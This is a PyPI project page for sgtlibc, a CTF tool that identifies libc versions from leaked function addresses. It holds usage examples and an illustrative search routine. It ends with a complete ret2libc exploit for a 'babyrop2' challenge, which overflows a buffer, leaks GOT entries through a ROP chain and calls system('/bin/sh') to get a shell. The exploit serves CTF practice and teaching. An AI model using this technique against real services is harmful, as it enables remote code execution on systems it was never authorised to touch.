| Name | sgtlibc |
|---|---|
| Version | 1.16.0 |
| home_page | https://github.com/serfend/sgtlibc |
| Summary | An offline Python library for searching libc functions and identifying the libc version. Use it like `sgtlibc puts:aa0+read:140 --dump system binsh`, or in Python like `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)` |
| upload_time | 2023-08-10 15:46:05 |
| maintainer | |
| docs_url | None |
| author | serfend |
| requires_python | >=3.7, <4 |
| license | MIT Licence |
| keywords | libcsearcher |
| VCS | |
| bugtrack_url | |
| requirements | No requirements were recorded. |
| Travis-CI | No Travis. |
| coveralls test coverage | No coveralls. |
# What?
[sgtlibc](https://github.com/serfend/sgtlibc) is an offline Python library for searching libc functions and identifying the libc version.
## Install
```shell
pip install sgtlibc
```
## Usage
```shell
usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =
sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -s [SYMBOLS], --symbols [SYMBOLS]
                        convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).
  -v [VERSION], --version [VERSION]
                        show version
```
## Quick Start
- in `cmd.exe` or `/bin/sh`
```shell
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
```
- in `python3`
```python
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))
```
## Example
- `main args` specify each `func-name` and `func address` pair. The help text says pairs **SHOULD be split by `|`**, while every example on this page joins them with `+`.
  e.g. `puts:aa0+read:140`, which means:
  - func-`puts` address = `0xaa0`
  - func-`read` address = `0x140`
- `--update` updates the libc database from the internet, based on `libc-database`; it **requires a non-Microsoft-Windows** system.
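
How a query such as `puts:aa0+read:140` can narrow the candidates down to one libc, shown as an added example that is not sgtlibc's own code. It assumes matching on the low 12 bits of each address (the page offset that ASLR leaves unchanged); `SAMPLE_DB`, `parse_conditions`, `search` and `resolve` are hypothetical names, and the symbol offsets are constructed for the example.

```python
# Added illustration, not sgtlibc's implementation.
PAGE_MASK = 0xFFF  # libc is mapped on 4 KiB page boundaries, so the low 12 bits survive ASLR

# Constructed symbol tables: offsets are made up for this example, not real libc builds.
SAMPLE_DB = {
    "libc-sample-a": {"puts": 0x6FAA0, "read": 0xF7140, "system": 0x45390, "str_bin_sh": 0x18CD57},
    "libc-sample-b": {"puts": 0x80AA0, "read": 0x110020, "system": 0x4F550, "str_bin_sh": 0x1B3E1A},
    "libc-sample-c": {"puts": 0x71910, "read": 0xE5140, "system": 0x3F480, "str_bin_sh": 0x1619D9},
}

def parse_conditions(query):
    """Parse 'puts:aa0+read:140' into {'puts': 0xaa0, 'read': 0x140}."""
    conditions = {}
    for pair in query.split("+"):
        name, sep, addr = pair.partition(":")
        if not sep or not name or not addr:
            raise ValueError(f"expected name:hexaddr, got {pair!r}")
        conditions[name] = int(addr, 16)
    return conditions

def search(db, conditions):
    """Return the libcs whose symbols agree with every condition in the low 12 bits."""
    hits = []
    for libc_name, symbols in sorted(db.items()):
        if all(name in symbols and (symbols[name] ^ addr) & PAGE_MASK == 0
               for name, addr in conditions.items()):
            hits.append(libc_name)
    return hits

def resolve(symbols, leaked_name, leaked_addr, wanted):
    """Turn one full leaked address into the load base and absolute addresses."""
    base = leaked_addr - symbols[leaked_name]
    if base & PAGE_MASK:
        # A misaligned base means the chosen libc or the leak is wrong.
        raise ValueError("base is not page aligned: wrong libc or bad leak")
    return base, {name: base + symbols[name] for name in wanted}

if __name__ == "__main__":
    print(search(SAMPLE_DB, parse_conditions("puts:aa0")))           # still ambiguous
    print(search(SAMPLE_DB, parse_conditions("puts:aa0+read:140")))  # narrowed to one
```

A single condition often matches several builds, which is why a second leaked symbol and the `--index` / `db_index` choice matter.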
### python run
- Run the [Python code above](/#/Quick Start); the output looks like the following:
![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)
### command run
- Run the command in a terminal; the output looks like the following:
![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)
### pwntools run
- use in `pwntools`
```python
from pwn import *  # run `pip install pwntools` first
import sgtlibc

s = sgtlibc.Searcher()
puts_addr = 0xf71234567aa0  # from leaked data
s.add_condition('puts', puts_addr)
s.dump(db_index=0)  # search libc; if several results are returned, index 0 is used by default
# p64 comes from pwntools; the demo below notes that p64 and p00 have the same effect
system_addr = p64(s.get_address(sgtlibc.s_system))
binsh_addr = p64(s.get_address(sgtlibc.s_binsh))
```
### use user-libc database
> search libc from user-directory
```python
import sgtlibc
from sgtlibc.utils import configuration as config


def test_use_user_libc():
    lib_path = './libs'  # put your libc directory here
    config.set(config.extension_database_path, lib_path)
    s = sgtlibc.LibcSearcher('puts', 0xf7007)
    s.decided()
```
### add user-libc database
> add a libc.so file to database
```bash
sgtlibc -s ./libc.from_user.so:alias_input_here
```
or
```python
from sgtlibc.main import do_symbols
do_symbols('./libc.from_user.so:alias_input_here')
```
## CTF Problem Solve DEMO
[view all sample files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)
- use exploit code
```python
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf


def exp():
    payload_exp = [b'a' * (28 + 4), fakeebp()]  # overflow position
    return payload_exp


def leak(func: str):
    payload = exp()
    # here will auto-pack to p64, you can use p64 or p00 as same effect.
    payload += [elf.rop['rdi'], elf.got[func], elf.plt['printf'], elf.symbols['main']]
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data


leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp()
payload += [elf.rop['rdi'], binsh_addr, system_addr, fakeebp()]
sl(payload)
interactive()
```
- result
![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)
## Notice
> The default libc database was last updated on `2022-06-01`, which is a long time ago; we strongly recommend updating it by running `sgtlibc --update`.